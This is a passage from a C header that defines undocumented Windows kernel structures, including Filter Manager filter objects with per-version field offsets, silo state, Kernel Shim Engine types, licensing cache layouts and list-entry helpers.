FLTFL_SUPPORTS_DAX_VOLUME = 32,\n FLTFL_SUPPORTS_WCOS = 64,\n FLTFL_FILTERS_READ_WRITE = 128,\n} FLT_FILTER_FLAGS, *PFLT_FILTER_FLAGS;\n\ntypedef enum _FLT_OBJECT_FLAGS {\n FLT_OBFL_DRAINING = 1,\n FLT_OBFL_ZOMBIED = 2,\n FLT_OBFL_TYPE_INSTANCE = 0x1000000,\n FLT_OBFL_TYPE_FILTER = 0x2000000,\n FLT_OBFL_TYPE_VOLUME = 0x4000000,\n} FLT_OBJECT_FLAGS, *PFLT_OBJECT_FLAGS;\n\ntypedef struct _FLT_OBJECT {\n ULONG Flags;\n ULONG PointerCount;\n EX_RUNDOWN_REF RundownRef;\n LIST_ENTRY PrimaryLink;\n} FLT_OBJECT, *PFLT_OBJECT;\n\n// Since w10 th1\ntypedef struct _FLT_OBJECT_V2 {\n ULONG Flags;\n ULONG PointerCount;\n EX_RUNDOWN_REF RundownRef;\n LIST_ENTRY PrimaryLink;\n GUID UniqueIdentifier;\n} FLT_OBJECT_V2, *PFLT_OBJECT_V2; /* size: 0x0030 */\n\n// Since w11 25h2\ntypedef struct _FLT_OBJECT_V3 {\n ULONG Flags;\n ULONG PointerCount;\n EX_RUNDOWN_REF RundownRef;\n LIST_ENTRY PrimaryLink;\n PVOID RundownLog;\n GUID UniqueIdentifier;\n} FLT_OBJECT_V3, * PFLT_OBJECT_V3; /* size: 0x0038 */\n\ntypedef struct _FLT_OBJECT_LOG_ENTRY {\n ULONG Action;\n LONG Padding_25;\n EX_RUNDOWN_REF RundownRef;\n PVOID Stack[14];\n} FLT_OBJECT_LOG_ENTRY, * PFLT_OBJECT_LOG_ENTRY; /* size: 0x0080 */\n\ntypedef struct _FLT_OBJECT_LOG {\n LONG Index;\n ULONG Reserved;\n FLT_OBJECT_LOG_ENTRY Log[1024];\n} FLT_OBJECT_LOG, * PFLT_OBJECT_LOG; /* size: 0x20008 */\n\ntypedef struct _FLT_SERVER_PORT_OBJECT {\n LIST_ENTRY FilterLink;\n PVOID ConnectNotify;\n PVOID DisconnectNotify;\n PVOID MessageNotify;\n PVOID Filter;\n PVOID Cookie;\n ULONG Flags;\n LONG NumberOfConnections;\n LONG MaxConnections;\n LONG __PADDING__[1];\n} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; /* size: 0x0048 */\n\ntypedef struct _FLT_RESOURCE_LIST_HEAD {\n ERESOURCE rLock;\n LIST_ENTRY rList;\n ULONG rCount;\n LONG __PADDING__[1];\n} FLT_RESOURCE_LIST_HEAD, *PFLT_RESOURCE_LIST_HEAD; /* size: 0x0080 */\n\ntypedef struct _FLT_MUTEX_LIST_HEAD {\n FAST_MUTEX mLock;\n LIST_ENTRY mList;\n union {\n ULONG mCount;\n struct {\n UCHAR mInvalid : 1;\n CHAR __PADDING__[7];\n };\n }; \n} FLT_MUTEX_LIST_HEAD, *PFLT_MUTEX_LIST_HEAD; /* size: 0x0050 */\n\n// Windows 7 version\ntypedef struct _FLT_FILTER_V1 {\n /* 0x0000 */ FLT_OBJECT Base;\n /* 0x0020 */ struct _FLTP_FRAME* Frame;\n /* 0x0028 */ UNICODE_STRING Name;\n /* 0x0038 */ UNICODE_STRING DefaultAltitude;\n /* 0x0048 */ FLT_FILTER_FLAGS Flags;\n /* 0x004c */ LONG Padding;\n /* 0x0050 */ DRIVER_OBJECT* DriverObject;\n /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n /* 0x00d8 */ struct FLT_VERIFIER_EXTENSION* VerifierExtension;\n /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;\n /* 0x00f0 */ PVOID FilterUnload /* function */;\n /* 0x00f8 */ PVOID InstanceSetup /* function */;\n /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;\n /* 0x0108 */ PVOID InstanceTeardownStart /* function */;\n /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;\n /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[6];\n /* 0x0150 */ PVOID PreVolumeMount /* function */;\n /* 0x0158 */ PVOID PostVolumeMount /* function */;\n /* 0x0160 */ PVOID GenerateFileName /* function */;\n /* 0x0168 */ PVOID NormalizeNameComponent /* function */;\n /* 0x0170 */ PVOID NormalizeNameComponentEx /* function */;\n /* 0x0178 */ PVOID NormalizeContextCleanup /* function */;\n /* 0x0180 */ PVOID KtmNotification /* function */;\n /* 0x0188 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n /* 0x0190 */ PVOID OldDriverUnload /* function */;\n /* 0x0198 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n /* 0x01e8 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n /* 0x0238 */ FLT_MUTEX_LIST_HEAD PortList;\n /* 0x0288 */ EX_PUSH_LOCK PortLock;\n} FLT_FILTER_V1, * PFLT_FILTER_V1; /* size: 0x0290 */\n\n// Windows 8/8.1 version\ntypedef struct _FLT_FILTER_V2 {\n /* 0x0000 */ FLT_OBJECT Base;\n /* 0x0020 */ struct _FLTP_FRAME* Frame;\n /* 0x0028 */ UNICODE_STRING Name;\n /* 0x0038 */ UNICODE_STRING DefaultAltitude;\n /* 0x0048 */ FLT_FILTER_FLAGS Flags;\n /* 0x004c */ LONG Padding;\n /* 0x0050 */ DRIVER_OBJECT* DriverObject;\n /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n /* 0x00d8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;\n /* 0x00f0 */ PVOID FilterUnload /* function */;\n /* 0x00f8 */ PVOID InstanceSetup /* function */;\n /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;\n /* 0x0108 */ PVOID InstanceTeardownStart /* function */;\n /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;\n /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n /* 0x0158 */ PVOID PreVolumeMount /* function */;\n /* 0x0160 */ PVOID PostVolumeMount /* function */;\n /* 0x0168 */ PVOID GenerateFileName /* function */;\n /* 0x0170 */ PVOID NormalizeNameComponent /* function */;\n /* 0x0178 */ PVOID NormalizeNameComponentEx /* function */;\n /* 0x0180 */ PVOID NormalizeContextCleanup /* function */;\n /* 0x0188 */ PVOID KtmNotification /* function */;\n /* 0x0190 */ PVOID SectionNotification /* function */; //SINCE 8.1\n /* 0x0198 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n /* 0x01a0 */ PVOID OldDriverUnload /* function */;\n /* 0x01a8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n /* 0x01f8 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n /* 0x0248 */ FLT_MUTEX_LIST_HEAD PortList;\n /* 0x0298 */ EX_PUSH_LOCK PortLock;\n} FLT_FILTER_V2, * PFLT_FILTER_V2; /* size: 0x02a0 */\n\n// Windows 10 version\ntypedef struct _FLT_FILTER_V3 {\n /* 0x0000 */ FLT_OBJECT_V2 Base;\n /* 0x0030 */ struct _FLTP_FRAME* Frame;\n /* 0x0038 */ UNICODE_STRING Name;\n /* 0x0048 */ UNICODE_STRING DefaultAltitude;\n /* 0x0058 */ FLT_FILTER_FLAGS Flags;\n /* 0x005c */ LONG Padding;\n /* 0x0060 */ DRIVER_OBJECT* DriverObject;\n /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;\n /* 0x0100 */ PVOID FilterUnload /* function */;\n /* 0x0108 */ PVOID InstanceSetup /* function */;\n /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;\n /* 0x0118 */ PVOID InstanceTeardownStart /* function */;\n /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;\n /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n /* 0x0168 */ PVOID PreVolumeMount /* function */;\n /* 0x0170 */ PVOID PostVolumeMount /* function */;\n /* 0x0178 */ PVOID GenerateFileName /* function */;\n /* 0x0180 */ PVOID NormalizeNameComponent /* function */;\n /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;\n /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;\n /* 0x0198 */ PVOID KtmNotification /* function */;\n /* 0x01a0 */ PVOID SectionNotification /* function */;\n /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n /* 0x01b0 */ PVOID OldDriverUnload /* function */;\n /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;\n /* 0x02a8 */ EX_PUSH_LOCK PortLock;\n} FLT_FILTER_V3, *PFLT_FILTER_V3; /* size: 0x02b0 */\n\n// Windows 10/11+ (22000)\ntypedef struct _FLT_FILTER_V4 {\n /* 0x0000 */ FLT_OBJECT_V2 Base;\n /* 0x0030 */ struct _FLTP_FRAME* Frame;\n /* 0x0038 */ UNICODE_STRING Name;\n /* 0x0048 */ UNICODE_STRING DefaultAltitude;\n /* 0x0058 */ FLT_FILTER_FLAGS Flags;\n /* 0x005c */ LONG Padding;\n /* 0x0060 */ DRIVER_OBJECT* DriverObject;\n /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;\n /* 0x0100 */ PVOID FilterUnload /* function */;\n /* 0x0108 */ PVOID InstanceSetup /* function */;\n /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;\n /* 0x0118 */ PVOID InstanceTeardownStart /* function */;\n /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;\n /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n /* 0x0168 */ PVOID PreVolumeMount /* function */;\n /* 0x0170 */ PVOID PostVolumeMount /* function */;\n /* 0x0178 */ PVOID GenerateFileName /* function */;\n /* 0x0180 */ PVOID NormalizeNameComponent /* function */;\n /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;\n /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;\n /* 0x0198 */ PVOID KtmNotification /* function */;\n /* 0x01a0 */ PVOID SectionNotification /* function */;\n /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n /* 0x01b0 */ PVOID OldDriverUnload /* function */;\n /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;\n /* 0x02a8 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;\n} FLT_FILTER_V4, * PFLT_FILTER_V4; /* size: 0x02b8 */\n\n// Windows 11+ (27XXX)\ntypedef struct _FLT_FILTER_V5 {\n /* 0x0000 */ FLT_OBJECT_V3 Base;\n /* 0x0038 */ struct _FLTP_FRAME* Frame;\n /* 0x0040 */ UNICODE_STRING Name;\n /* 0x0050 */ UNICODE_STRING DefaultAltitude;\n /* 0x0060 */ FLT_FILTER_FLAGS Flags;\n /* 0x0064 */ LONG Padding;\n /* 0x0068 */ DRIVER_OBJECT* DriverObject;\n /* 0x0070 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n /* 0x00f0 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n /* 0x00f8 */ LIST_ENTRY VerifiedFiltersLink;\n /* 0x0108 */ PVOID FilterUnload /* function */;\n /* 0x0110 */ PVOID InstanceSetup /* function */;\n /* 0x0118 */ PVOID InstanceQueryTeardown /* function */;\n /* 0x0120 */ PVOID InstanceTeardownStart /* function */;\n /* 0x0128 */ PVOID InstanceTeardownComplete /* function */;\n /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n /* 0x0138 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n /* 0x0170 */ PVOID PreVolumeMount /* function */;\n /* 0x0178 */ PVOID PostVolumeMount /* function */;\n /* 0x0180 */ PVOID GenerateFileName /* function */;\n /* 0x0188 */ PVOID NormalizeNameComponent /* function */;\n /* 0x0190 */ PVOID NormalizeNameComponentEx /* function */;\n /* 0x0198 */ PVOID NormalizeContextCleanup /* function */;\n /* 0x01a0 */ PVOID KtmNotification /* function */;\n /* 0x01a8 */ PVOID SectionNotification /* function */;\n /* 0x01b0 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n /* 0x01b8 */ PVOID OldDriverUnload /* function */;\n /* 0x01c0 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n /* 0x0210 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n /* 0x0260 */ FLT_MUTEX_LIST_HEAD PortList;\n /* 0x02b0 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;\n} FLT_FILTER_V5, * PFLT_FILTER_V5; /* size: 0x02c0 */\n\ntypedef FLT_FILTER_V5 FLT_FILTER_COMPATIBLE;\ntypedef PFLT_FILTER_V5 PFLT_FILTER_COMPATIBLE;\n\n/*\n** FLT MANAGER END\n*/\n\n/*\n** SILO START\n*/\n\ntypedef struct _SYSTEM_ROOT_SILO_INFORMATION {\n ULONG NumberOfSilos;\n ULONG SiloIdList[1];\n} SYSTEM_ROOT_SILO_INFORMATION, *PSYSTEM_ROOT_SILO_INFORMATION;\n\ntypedef struct _SILO_USER_SHARED_DATA {\n ULONG ServiceSessionId;\n ULONG ActiveConsoleId;\n LONGLONG ConsoleSessionForegroundProcessId;\n NT_PRODUCT_TYPE NtProductType;\n ULONG SuiteMask;\n ULONG SharedUserSessionId; // since RS2\n BOOLEAN IsMultiSessionSku;\n WCHAR NtSystemRoot[260];\n USHORT UserModeGlobalLogger[16];\n ULONG TimeZoneId; // since 21H2\n LONG TimeZoneBiasStamp;\n KSYSTEM_TIME TimeZoneBias;\n LARGE_INTEGER TimeZoneBiasEffectiveStart;\n LARGE_INTEGER TimeZoneBiasEffectiveEnd;\n} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;\n\ntypedef struct _OBP_SYSTEM_DOS_DEVICE_STATE {\n ULONG GlobalDeviceMap;\n ULONG LocalDeviceCount[26];\n} OBP_SYSTEM_DOS_DEVICE_STATE, *POBP_SYSTEM_DOS_DEVICE_STATE;\n\ntypedef struct _OBP_SILODRIVERSTATE {\n PDEVICE_MAP SystemDeviceMap;\n OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;\n EX_PUSH_LOCK DeviceMapLock;\n OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;\n} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;\n\ntypedef struct _OBP_SILODRIVERSTATE_V2 {\n EX_FAST_REF SystemDeviceMap;\n OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;\n EX_PUSH_LOCK DeviceMapLock;\n OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;\n} OBP_SILODRIVERSTATE_V2, * POBP_SILODRIVERSTATE_V2; /* size: 0x02e0 */\n\n//incomplete, values not important, change between versions.\ntypedef struct _ESERVERSILO_GLOBALS {\n OBP_SILODRIVERSTATE ObSiloState;\n //incomplete\n} ESERVERSILO_GLOBALS, *PESERVERSILO_GLOBALS;\n\n/*\n** SILO END\n*/\n\n/*\n** KSE START\n*/\n\ntypedef enum _KSE_DISABLE_FLAGS {\n DisableNone = 0,\n DisableDriverShims = 1,\n DisableDeviceShims = 2,\n MaxDisableFlags\n} KSE_DISABLE_FLAGS;\n\ntypedef enum _KSE_STATE {\n KseNotReady = 0,\n KseInProgress = 1,\n KseReady = 2\n} KSE_STATE;\n\n#define KseFlagsNone 0x0000\n#define KseFlagsGroupPolicyOk 0x0002\n#define KseFlagsVerifierEnabled 0x0040\n#define KseFlagsNoDb 0x0080 \n#define KseFlagsInitSafeMode 0x0100\n#define KseFlagsDrvShimActive 0x0800\n#define KseFlagsDevShimsActive 0x1000\n\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#pragma warning(disable:4324) // structure was padded due to __declspec(align())\n#endif\ntypedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_KSE_ENGINE {\n KSE_DISABLE_FLAGS DisableFlags;\n KSE_STATE State;\n ULONG Flags; //KseFlags*\n LIST_ENTRY ProvidersListHead;\n LIST_ENTRY ShimmedDriversListHead;\n PVOID KseGetIoCallbacksRoutine;\n PVOID KseSetCompletionHookRoutine;\n PVOID DeviceInfoCache;\n PVOID HardwareIdCache;\n PVOID ShimmedDriverHint;\n} KSE_ENGINE, * PKSE_ENGINE;\n\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\ntypedef struct _KSE_SHIM {\n ULONG Size;\n GUID* Guid;\n PWCHAR Name;\n PVOID KseCallbackRoutines;\n PVOID RemoveNotificationRoutine;\n PVOID ApplyNotificationRoutine;\n PVOID HookCollectionsArray;\n} KSE_SHIM, * PKSE_SHIM;\n\ntypedef enum _KSE_HOOK_COLLECTION_TYPE {\n HookNtOsImport = 0,\n HookHalImport = 1,\n HookNamedModuleImports = 2,\n HookCallbacks = 3,\n HookLastCollection = 4\n} KSE_HOOK_COLLECTION_TYPE;\n\ntypedef struct _KSE_HOOK_COLLECTION {\n KSE_HOOK_COLLECTION_TYPE Type;\n PWCHAR TargetDriverName;\n PVOID HookArray;\n} KSE_HOOK_COLLECTION, * PKSE_HOOK_COLLECTION;\n\ntypedef enum _KSE_HOOK_TYPE {\n HookFunction = 0,\n HookIrpCallback = 1,\n HookLast = 2\n} KSE_HOOK_TYPE, * PKSE_HOOK_TYPE;\n\ntypedef struct _KSE_HOOK {\n KSE_HOOK_TYPE Type;\n union {\n PCHAR FunctionName;\n ULONG CallbackId;\n } DUMMYUNION;\n PVOID HookFunction;\n PVOID OriginalFunction;\n} KSE_HOOK, * PKSE_HOOK;\n\ntypedef struct _KSE_PROVIDER {\n LIST_ENTRY ProviderList;\n PKSE_SHIM Shim;\n} KSE_PROVIDER, * PKSE_PROVIDER;\n\ntypedef struct _KSE_SHIMMED_DRIVER {\n LIST_ENTRY ListEntry;\n PVOID DriverBaseAddress;\n ULONG RefCount;\n GUID* ShimGuid;\n //incomplete\n} KSE_SHIMMED_DRIVER, * PKSE_SHIMMED_DRIVER;\n\n/*\n** KSE END\n*/\n\n/*\n** SOFTWARE LICENSING START\n*/\n#pragma pack(push, 1)\ntypedef struct _SL_CACHE_VALUE_DESCRIPTOR {\n USHORT Size;\n USHORT NameLength;\n USHORT Type;\n USHORT DataLength;\n ULONG Attributes;\n ULONG Reserved;\n WCHAR Name[ANYSIZE_ARRAY];\n} SL_CACHE_VALUE_DESCRIPTOR, *PSL_CACHE_VALUE_DESCRIPTOR;\ntypedef SL_CACHE_VALUE_DESCRIPTOR SL_KMEM_CACHE_VALUE_DESCRIPTOR;\n#pragma pack(pop)\n\ntypedef struct _SL_CACHE {\n ULONG TotalSize;\n ULONG SizeOfData;\n ULONG SignatureSize;\n ULONG Flags;\n ULONG Version;\n SL_KMEM_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];\n} SL_CACHE, *PSL_CACHE;\ntypedef SL_CACHE SL_KMEM_CACHE;\n\ntypedef struct _SL_APPX_CACHE_VALUE_DESCRIPTOR {\n UCHAR HashedName[32];\n ULONGLONG Expiration;\n ULONG DataSize;\n WCHAR Name[ANYSIZE_ARRAY];\n} SL_APPX_CACHE_VALUE_DESCRIPTOR, *PSL_APPX_CACHE_VALUE_DESCRIPTOR;\n\ntypedef struct _SL_APPX_CACHE {\n ULONG Version;\n ULONG Flags;\n ULONG DataSize;\n ULONGLONG DataCheckSum;\n SL_APPX_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];\n} SL_APPX_CACHE, *PSL_APPX_CACHE;\n\n\n/*\n** SOFTWARE LICENSING END\n*/\n\n/*\n** List Entry macro START (wdm.h)\n*/\n\n#if defined (NTOS_ENABLE_LIST_ENTRY_MACRO)\n\n#define InitializeListHead32(ListHead) (\\\n (ListHead)->Flink = (ListHead)->Blink = PtrToUlong((ListHead)))\n\nFORCEINLINE\nVOID\nInitializeListHead(\n _Out_ PLIST_ENTRY ListHead\n)\n{\n ListHead->Flink = ListHead->Blink = ListHead;\n return;\n}\n\n_Must_inspect_result_\nBOOLEAN\nCFORCEINLINE\nIsListEmpty(\n _In_ const LIST_ENTRY* ListHead\n)\n{\n return (BOOLEAN)(ListHead->Flink == ListHead);\n}\n\nFORCEINLINE\nBOOLEAN\nRemoveEntryList(\n _In_ PLIST_ENTRY Entry\n)\n{\n PLIST_ENTRY Blink;\n PLIST_ENTRY Flink;\n\n Flink = Entry->Flink;\n Blink = Entry->Blink;\n Blink->Flink = Flink;\n Flink->Blink = Blink;\n return (BOOLEAN)(Flink == Blink);\n}\n\nFORCEINLINE\nPLIST_ENTRY\nRemoveHeadList(\n _Inout_ PLIST_ENTRY ListHead\n)\n{\n PLIST_ENTRY Flink;\n PLIST_ENTRY Entry;\n\n Entry = ListHead->Flink;\n Flink = Entry->Flink;\n ListHead->Flink = Flink;\n Flink->Blink = ListHead;\n return Entry;\n}\n\nFORCEINLINE\nPLIST_ENTRY\nRemoveTailList(\n _Inout_ PLIST_ENTRY ListHead\n)\n{\n PLIST_ENTRY Blink;\n PLIST_ENTRY Entry;\n\n Entry = ListHead->Blink;\n Blink = Entry->Blink;\n ListHead->Blink = Blink;\n Blink->Flink = ListHead;\n return Entry;\n}\n\nFORCEINLINE\nVOID\nInsertTailList(\n _Inout_ PLIST_ENTRY ListHead,\n _Inout_ __drv_aliasesMem PLIST_ENTRY Entry\n)\n{\n PLIST_ENTRY Blink;\n\n Blink = ListHead->Blink;\n Entry->Flink = ListHead;\n Entry->Blink = Blink;\n Blink->Flink = Entry;\n ListHead->Blink = Entry;\n return;\n}\n\nFORCEINLINE\nVOID\nInsertHeadList(\n _Inout_ PLIST_ENTRY ListHead,\n _Inout_ __drv_aliasesMem PLIST_ENTRY Entry\n)\n{\n PLIST_ENTRY Flink;\n\n Flink = ListHead->Flink;\n Entry->Flink = Flink;\n Entry->Blink = ListHead;\n Flink->Blink = Entry;\n ListHead->Flink = Entry;\n return;\n}\n\nFORCEINLINE\nVOID\nAppendTailList(\n _Inout_ PLIST_ENTRY ListHead,\n _Inout_ PLIST_ENTRY ListToAppend\n)\n{\n PLIST_ENTRY ListEnd = ListHead->Blink;\n\n ListHead->Blink->Flink = ListToAppend;\n ListHead->Blink = ListToAppend->Blink;\n ListToAppend->Blink->Flink = ListHead;\n ListToAppend->Blink = ListEnd;\n return;\n}\n\nFORCEINLINE\nPSINGLE_LIST_ENTRY\nPopEntryList(\n _Inout_ PSINGLE_LIST_ENTRY ListHead\n)\n{\n PSINGLE_LIST_ENTRY FirstEntry;\n\n FirstEntry = ListHead->Next;\n if (FirstEntry != NULL) {\n ListHead->Next = FirstEntry->Next;\n }\n\n return FirstEntry;\n}\n\nFORCEINLINE\nVOID\nPushEntryList(\n _Inout_ PSINGLE_LIST_ENTRY ListHead,\n _Inout_ __drv_aliasesMem PSINGLE_LIST_ENTRY Entry\n)\n{\n Entry->Next = ListHead->Next;\n ListHead->Next = Entry;\n return;\n}\n\n#define ASSERT_LIST_ENTRY_VALID(ListEntry) { \\\n if (ListEntry == NULL) \\\n return; \\\n if (ListEntry->Flink == NULL || ListEntry->Blink == NULL) \\\n return; \\\n}\n\n#define ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, X) { \\\n if (ListEntry == NULL) \\\n return X; \\\n if (ListEntry->Flink == NULL || ListEntry->Blink == NULL) \\\n return X; \\\n}\n\n#define ASSERT_LIST_ENTRY_VALID_BOOLEAN(ListEntry) ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, FALSE)\n\n#endif /* NTOS_ENABLE_LIST_ENTRY_MACRO */\n\n/*\n** List Entry macro END\n*/\n\n/*\n** LDR START\n*/\n\n#define LDR_DLL_NOTIFICATION_REASON_LOADED 1\n#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2\n\ntypedef enum _LDR_DLL_LOAD_REASON {\n LoadReasonStaticDependency = 0,\n LoadReasonStaticForwarderDependency,\n LoadReasonDynamicForwarderDependency,\n LoadReasonDelayloadDependency,\n LoadReasonDynamicLoad,\n LoadReasonAsImageLoad,\n LoadReasonAsDataLoad,\n LoadReasonEnclavePrimary,\n LoadReasonEnclaveDependency,\n LoadReasonPatchImage,\n LoadReasonUnknown = -1\n} LDR_DLL_LOAD_REASON, * PLDR_DLL_LOAD_REASON;\n\n//\n// Dll Characteristics for LdrLoadDll\n//\n#define LDR_IGNORE_CODE_AUTHZ_LEVEL 0x00001000\n\n//\n// LdrAddRef Flags\n//\n#define LDR_ADDREF_DLL_PIN 0x00000001\n\n//\n// LdrLockLoaderLock Flags\n//\n#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001\n#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002\n\n//\n// LdrUnlockLoaderLock Flags\n//\n#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001\n\n//\n// LdrGetDllHandleEx Flags\n//\n#define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT 0x00000001\n#define LDR_GET_DLL_HANDLE_EX_PIN 0x00000002\n\n//\n// LdrGetProcedureAddressEx Flags\n//\n#define LDR_GET_PROCEDURE_ADDRESS_DONT_RECORD_FORWARDER 0x00000001\n\n#define RESOURCE_TYPE_LEVEL 0\n#define RESOURCE_NAME_LEVEL 1\n#define RESOURCE_LANGUAGE_LEVEL 2\n#define RESOURCE_DATA_LEVEL 3\n\ntypedef struct _LDR_RESOURCE_INFO {\n ULONG_PTR Type;\n ULONG_PTR Name;\n ULONG Lang;\n} LDR_RESOURCE_INFO, * PLDR_RESOURCE_INFO;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {\n LIST_ENTRY InLoadOrderLinks;\n LIST_ENTRY InMemoryOrderLinks;\n union\n {\n LIST_ENTRY InInitializationOrderLinks;\n LIST_ENTRY InProgressLinks;\n } DUMMYUNION0;\n PVOID DllBase;\n PVOID EntryPoint;\n ULONG SizeOfImage;\n UNICODE_STRING FullDllName;\n UNICODE_STRING BaseDllName;\n union\n {\n ULONG Flags;\n struct\n {\n ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1\n ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1\n ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1\n ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1\n ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1\n ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1\n ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1\n ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1\n ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1\n ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1\n ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2\n ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1\n ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1\n ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1\n ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1\n ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2\n ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1\n ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1\n ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1\n ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1\n ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1\n ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1\n ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1\n ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1\n ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2\n ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1\n ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2\n ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1\n };\n } ENTRYFLAGSUNION;\n WORD ObsoleteLoadCount;\n WORD TlsIndex;\n union\n {\n LIST_ENTRY HashLinks;\n struct\n {\n PVOID SectionPointer;\n ULONG CheckSum;\n };\n } 